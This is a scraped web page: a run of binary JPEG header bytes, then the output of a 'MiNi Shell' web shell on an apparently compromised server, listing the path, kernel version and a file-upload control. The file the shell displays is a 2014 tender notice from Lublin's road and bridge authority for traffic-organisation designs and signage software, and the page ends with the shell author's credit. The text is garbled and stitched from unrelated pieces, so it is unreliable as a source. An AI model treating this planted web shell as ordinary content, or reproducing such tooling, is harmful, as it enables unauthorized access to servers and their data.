JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140610/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140610/125097-N-2014.html

<p class="kh_header"><b>Lublin: Wykonanie projektu organizacji ruchu dla ulic administrowanych przez Zarząd Dróg i Mostów w Lublinie wraz z dostawą oprogramowania do projektowania oznakowania</b><br>
<b>Numer ogłoszenia: 125097 - 2014; data zamieszczenia: 10.06.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Dróg i Mostów w Lublinie , ul. Krochmalna 13j, 20-401 Lublin, woj. lubelskie, tel. 81 466 5700, faks 81 466 5701.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://zdm.bip.lublin.eu</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: gminna jednostka budżetowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie projektu organizacji ruchu dla ulic administrowanych przez Zarząd Dróg i Mostów w Lublinie wraz z dostawą oprogramowania do projektowania oznakowania.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Zakres zamówienia obejmuje: 
Zadanie 1:  Projekt organizacji ruchu - Etap I,
Zadanie 2: Projekt organizacji ruchu-  Etap II,
Zadanie 3: Projekt organizacji ruchu-  Etap III,
Zadanie 4: Projekt organizacji ruchu - informacji drogowskazowej,
Zadanie 5: Projekt organizacji ruchu - ograniczeń tonażowych,
Zadanie 6: Projekt organizacji ruchu - tras przejazdu pojazdów  z materiałami niebezpiecznymi: 
zwane dalej  dokumentacją projektową (zadanie 1 do 6 włącznie),
oraz 
Zadanie 7: Dostawa i instalacja stacji roboczej, 3 stanowisk komputerowych do obsługi tworzonej bazy danych Komputerowej Mapy Oznakowania oraz dostawa i instalacja oprogramowania do obsługi Komputerowej Mapy Oznakowania 
zwane dalej  oprogramowanie.  
2. Projekt organizacji ruchu - Etap I:
Projekt organizacji ruchu obejmujący zinwentaryzowane elementy organizacji ruchu 	(oznakowanie pionowe, poziome i urządzenia bezpieczeństwa ruchu) uwzględniający tylko niezbędne korekty i 	uzupełnienia w podstawowym zakresie (tj. których brak może skutkować bezpośrednimi 	zagrożeniami bezpieczeństwa ruchu drogowego np: nieprawidłowo oznakowane skrzyżowanie) - w dostosowaniu do obowiązujących przepisów. Zakres opracowania obejmuje obszar ograniczony ulicami (wraz z tymi ulicami  i skrzyżowaniami w ich  przebiegu): al. Tysiąclecia - al. Solidarności - al. Warszawska - al. Kraśnicka -  ul. Bohaterów Monte Cassino - ul. Armii Krajowej - ul. Jana Pawła II - 
ul. Krochmalna - ul. Młyńska - ul. Unii Lubelskiej.
3. Projekt organizacji ruchu - Etap II: Projekt organizacji ruchu obejmujący zinwentaryzowane elementy organizacji ruchu (oznakowanie pionowe, poziome i urządzenia bezpieczeństwa ruchu) uwzględniający tylko niezbędne korekty i uzupełnienia w podstawowym zakresie (tj. których brak może skutkować bezpośrednimi zagrożeniami bezpieczeństwa ruchu drogowego np: nieprawidłowo oznakowane skrzyżowanie) - w dostosowaniu do obowiązujących przepisów. Zakres opracowania obejmuje pozostały obszar administracyjny miasta nie ujęty w Etapie I.
4. Projekt organizacji ruchu - Etap III:
Projekt organizacji ruchu uwzględniający dostosowanie (sprawdzenie, poprawa, aktualizacja) istniejącego oznakowania do w/w obowiązujących przepisów oraz zaprojektowanie nowych elementów organizacji ruchu zgodnie z zaleceniami Zamawiającego oraz organów opiniujących i zatwierdzających w zakresie zmian organizacji ruchu.   
Zakres opracowania obejmuje obszar w granicach administracyjnych miasta Lublin.
5. Projekt informacji drogowskazowej winien uwzględniać:
a) nowe połączenia komunikacyjne miasta i zalecenia dotyczące prowadzenia kierunków wg zasad opisanych w Rozporządzeniu Ministra Infrastruktury z dnia 23 września 2003 r. w sprawie szczegółowych warunków zarządzania ruchem na drogach oraz wykonywania nadzoru nad tym zarządzeniem oraz będące w dyspozycji  ZDiM w Lublinie Mapy oznakowania kierunkowego z GDDKiA),
b) przedstawienie oznakowania drogowskazowego na planszy z planem sytuacyjnym miasta oraz plansze ze szczegółową lokalizacją znaków na planie sytuacyjnym z naniesionymi elementami organizacji ruchu,
c) zestawienie wszystkich znaków informacji drogowskazowej z projektami poszczególnych znaków. 
6. Projekt ograniczeń tonażowych winien uwzględniać:
a) wprowadzenie w ciągu dróg krajowych, wojewódzkich i wybranych powiatowych organizacji ruchu wprowadzającej zakaz wjazdu dla pojazdów ciężarowych o dopuszczalnej masie całkowitej powyżej 16  ton w godzinach szczytu komunikacyjnego i w godzinach nocnych, to jest w godzinach: 6:00 - 9:00, 13:00 - 18:00, 22:00 - 4:00; 
b) tranzyt, czyli przejazdy bez wskazania punktu docelowego na terenie miasta Lublina należy realizować:
-  z wykorzystaniem Północnej Obwodnicy Lublina na odcinku od węzła Witosa do węzła Dąbrowica,
- w przypadku przejazdów DK Nr 19 (w kierunku Kraśnika) powinny się odbywać po trasie al. Kraśnicka - al. Sikorskiego - al. Solidarności - Węzeł Dąbrowica;
W przypadku docelowego miejsca podróży zlokalizowanego w obrębie strefy ograniczonego tonażu - 16 ton (z zastrzeżeniem, że może być ustalona inna wielkość na etapie projektowania), wjazd będzie się odbywał na podstawie zezwolenia na niestosowanie się do znaków B-5 (zakaz wjazdu samochodów ciężarowych o dopuszczalnej masie całkowitej powyżej 16 t) zlokalizowanych na wjeździe do Lublina, drogach wskazanych w pkt 6 lit. a);
c) wprowadzenie na wjazdach do obszarów zabudowy mieszkaniowej ograniczeń tonażowych do 3,5 t;
d) wprowadzenie na wjazdach do obszarów zabudowy mieszkaniowej ograniczeń tonażowych do 2,5 t;
e) inne szczególne ograniczenia tonażowe;
f) przedstawienie oznakowania tonażowego na planszy z planem sytuacyjnym miasta Lublin oraz plansze ze szczegółową lokalizacją znaków na planie 	sytuacyjnym z naniesionymi elementami organizacji ruchu.
7. Projekt stref ograniczenia prędkości winien uwzględniać przedstawienie oznakowania drogowskazowego na planszy z planem sytuacyjnym miasta oraz wskazanie odniesienia (np. tabelarycznie do projektu stałej organizacji ruchu - nr tomu, strona, numer rysunku, opis lokalizacji). 
8. Projekt oznakowania związany z trasami przejazdu pojazdów z materiałami niebezpiecznymi winien uwzględniać przedstawienie oznakowania tonażowego na planszy z planem sytuacyjnym miasta Lublin oraz plansze ze szczegółową lokalizacją znaków na planie sytuacyjnym z naniesionymi elementami organizacji ruchu.
9. W czasie opracowywania projektów Wykonawca jest zobowiązany do uwzględnienia zmian w organizacji ruchu, zatwierdzonych przez organ zarządzający ruchem, wskazanych przez Zamawiającego.
10. Dostawa i instalacje oprogramowania do obsługi Komputerowej Mapy Oznakowania. Oprogramowanie musi spełniać następujące wymagania:
polska wersja językowa obejmująca wszystkie elementy programu oraz instrukcję obsługi,
środowisko systemowe: Microsoft Windows XP Vista 7 -8 - 32 i 64 bitowy,
dostosowanie do pracy na stanowiskach dwumonitorowych,
dostosowanie do pracy w sieci, w systemie klient - serwer,
format bazy danych: relacyjna baza danych,
jednoczesny odczyt danych na kilku stanowiskach, edycja na wybranych komputerach,
instalacja na wskazanych stanowiskach w siedzibie Zamawiającego i możliwość jednoczesnej pracy na 3 stanowiskach,
dostęp do bazy programu musi być autoryzowany i następować poprzez login i hasło,  które powinno się składać przynajmniej z sześciu znaków w tym znak specjalny, cyfra, 	mała litera, duża litera, system powinien wymuszać zmianę hasła raz w miesiącu. Dodatkowo program powinien posiadać możliwość ustawienia uprawnień dla użytkowników do pracy z poszczególnymi modułami i dostępem do wybranych danych w zakresie ich odczytu, modyfikacji i usunięcia,
program musi posiadać w menu pomoc kontekstową, a także wydrukowaną instrukcję obsługi oprogramowania z objaśnieniem wszystkich funkcji. Instrukcja w wersji PDF 	powinna być automatycznie umieszczana na komputerze podczas instalacji,
program musi wyświetlać informację o jego wersji oraz listę zmian w funkcjonalności, w przypadku późniejszych jego aktualizacji,
obsługę danych zapisanych w formatach: shp, dxf, dgn, dwg, mif, tif oraz Oracle Spatial - obsługa serwisów WMS i WFS,
eksport do standardowych plików wymiany do formatu DXF, DGN i SHP, dane zawarte w pliku eksportu muszą zawierać pełną informację o zinwentaryzowanych obiektach. 
11. Dostawa i instalacja stacji roboczej, 3 stanowisk komputerowych do obsługi tworzonej bazy danych Komputerowej Mapy Oznakowania oraz dostawa i instalacja oprogramowania do obsługi Komputerowej Mapy Oznakowania. 
12. Szkolenie pracowników..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.32.20.00-1, 72.31.00.00-1, 30.21.00.00-4, 72.26.80.00-1, 80.51.00.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie ma wymogu wnoszenia wadium przez wykonawców</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Jako spełniający warunki udziału w postępowaniu zostaną ocenieni wykonawcy, którzy wykażą wykonanie min. 3 usług w zakresie opracowania projektów stałej organizacji ruchu lub ich aktualizacji dla  krajowych, wojewódzkich lub powiatowych dróg o zakresie nie mniejszym niż 50 km długości dróg każda usługa, w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy -
w tym okresie.
Wartość usług w walucie innej niż PLN, Wykonawca powinien przeliczyć na PLN wg średniego kursu NBP z dnia publikacji ogłoszenia o niniejszym zamówieniu, natomiast w przypadku braku przeliczenia przez Wykonawcę Zamawiający dokona przeliczenia na PLN wg kursu średniego NBP na dzień, w którym opublikowano ogłoszenie o niniejszym zamówieniu.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>Obowiązek wskazania w wykazie i potwierdzenia należytej realizacji dokumentem dotyczy: wykonania min. 3 usług w zakresie opracowania projektów stałej organizacji ruchu lub ich aktualizacji dla  krajowych, wojewódzkich lub powiatowych dróg o zakresie nie mniejszym niż 50 km długości dróg każda usługa, w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie.;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Formularz ofertowy - w przypadku składania oferty przez podmioty występujące wspólnie należy podać nazwy (firmy) oraz dokładne adresy wszystkich wykonawców składających ofertę wspólną. 2. Oświadczenie o części zamówienia, której wykonanie, wykonawca powierzy podwykonawcom w przypadku powierzenia przez wykonawcę części zamówienia podwykonawcom. 3. Wykaz oferowanego sprzętu. 4. Pełnomocnictwo do reprezentowania w postępowaniu albo do reprezentowania w postępowaniu i zawarcia umowy, w przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia zgodnie z art. 23 ustawy Pzp (dotyczy również wspólników spółki cywilnej). 5. Pełnomocnictwo do występowania w imieniu wykonawcy, w przypadku gdy dokumentów składających się na ofertę nie podpisuje osoba uprawniona do reprezentowania wykonawcy lub wykonawca - w przypadku osób fizycznych. 6. Wykonawca w sytuacji, gdy polega na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków, zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia. 7. Jeżeli w kraju miejsca zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt III.4.3), zastępuje się je dokumentem zawierającym oświadczenie w którym określa się także osoby uprawnione do reprezentacji wykonawcy, złożone przed właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, lub przed notariuszem - wystawionym nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Strony przewidują następujące rodzaje i warunki zmiany treści umowy:
1) Zmiana stawki i kwoty podatku VAT oraz wynagrodzenia brutto. Stawka i kwota podatku VAT oraz wynagrodzenie brutto ulegną zmianie odpowiednio do przepisów prawa wprowadzających zmianę stawki podatku VAT.
2) Zmiany finansowania w zakresie wynikającym ze zmian w planie finansowym Zamawiającego (Budżetu Miasta) lub zmian w potrzebach Zamawiającego w zakresie jego uzasadnionego interesu; 
3) Zmiana terminu realizacji przedmiotu zamówienia w przypadku:
a) działania siły wyższej, uniemożliwiającej wykonanie umowy w określonym pierwotnie terminie - o czas działania siły wyższej oraz czas potrzebny do usunięcia skutków tego działania,
b) realizacji w drodze odrębnej umowy prac powiązanych z przedmiotem umowy, wymuszającej konieczność skoordynowania prac i uwzględniania wzajemnych powiązań - o okres niezbędny do wykonania prac powiązanych z przedmiotem umowy, realizowanych w drodze odrębnej umowy, 
c) wystąpienia niezależnego od Wykonawcy przedłużania się powyżej 30 dni pozyskiwania uzgodnień i warunków do projektowania od dysponentów mediów, ZUDP i innych właściwych organów czy instytucji oraz przedłużanie się pozyskiwania wszelkich decyzji niezbędnych do otrzymania koniecznych uzgodnień - o najdłuższy okres przez jaki okoliczności te wystąpiły, 
d) konieczności wykonania dodatkowych badań i ekspertyz - o czas niezbędny do wykonania dodatkowych  badań i ekspertyz;
4) Zmiana terminu obowiązywania udzielonych gwarancji w przypadku zmiany terminu realizacji przedmiotu zamówienia - o okres wynikający z przedłużenia terminu realizacji przedmiotu zamówienia;  
5) Powierzenie podwykonawcy dodatkowego zakresu robót po uprzednim zaakceptowaniu przez Zamawiającego podwykonawcy wskazanego przez Wykonawcę z jednoczesną zmianą (rozszerzeniem) zapisu umowy poprzez wprowadzenie do niego stosownych zapisów dotyczących udziału Podwykonawcy,
6) Zmiana podwykonawcy lub rezygnacja z realizacji określonego zakresu zamówienia za pomocą podwykonawcy, w przypadku stwierdzenia przez Zamawiającego lub Wykonawcę, że podwykonawca realizujący usługi objęte przedmiotem zamówienia wykonuje je nienależycie. Jeżeli zmiana albo rezygnacja z podwykonawcy dotyczy podmiotu, na którego zasoby Wykonawca powoływał się, na zasadach określonych w art. 26 ust. 2b ustawy Prawo zamówień publicznych, w celu wykazania spełniania warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy Prawo zamówień publicznych, Wykonawca zobowiązany jest wykazać Zamawiającemu, że proponowany inny podwykonawca lub Wykonawca samodzielnie spełnia je w stopniu nie mniejszym niż wymagany w trakcie postępowania o udzielenie zamówienia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://zdm.bip.lublin.eu<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zarząd Dróg i Mostów w Lublinie, 20-401 Lublin, ul. Krochmalna 13j, pok. 9 po okazaniu dowodu wpłaty 20 zł na konto: 27124015031111001040201730 lub za zaliczeniem pocztowym.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.06.2014 godzina 09:30, miejsce: Zarząd Dróg i Mostów w Lublinie, 20-401 Lublin, ul. Krochmalna 13j, pokój nr 9 (I piętro).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1. Termin wykonania zamówienia - do dnia 30 listopada 2016 roku, w tym: 
1) Zadanie 1 - w terminie do 5 miesięcy od dnia podpisania umowy;
2) Zadanie 2 - do dnia 30.11.2015 r.;
3) Zadanie 3 - do dnia 30.11.2016 r.; 
4) Zadanie 4 - do dnia 30.06.2016 r.; 
5) Zadanie 5 - 30.06.2016 r.;
6) Zadanie 6 - do dnia 30.06.2015 r.;
7) Zadanie 7 - w terminie do 4 miesięcy od dnia podpisania umowy.  
2. Osobami upoważnionymi do kontaktowania się z wykonawcami są:
2.1. W zakresie przedmiotu zamówienia: 
2.1.1. p. Andrzej Matacz - Zarząd Dróg i Mostów w Lublinie, ul. Krochmalna 13i, pok. nr 111, telefon 81-466-57-15;
2.1.2. p. Tomasz Dąbrowski - Zarząd Dróg i Mostów w Lublinie, ul. Krochmalna 13i, pok. nr 113, telefon 81-466-25-81.
2.2. W zakresie procedury: p. Agnieszka Charachajczuk - Zarząd Dróg i Mostów w Lublinie - ul. Krochmalna 13j piętro I, pokój nr 9, telefon 81-466-57-10..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com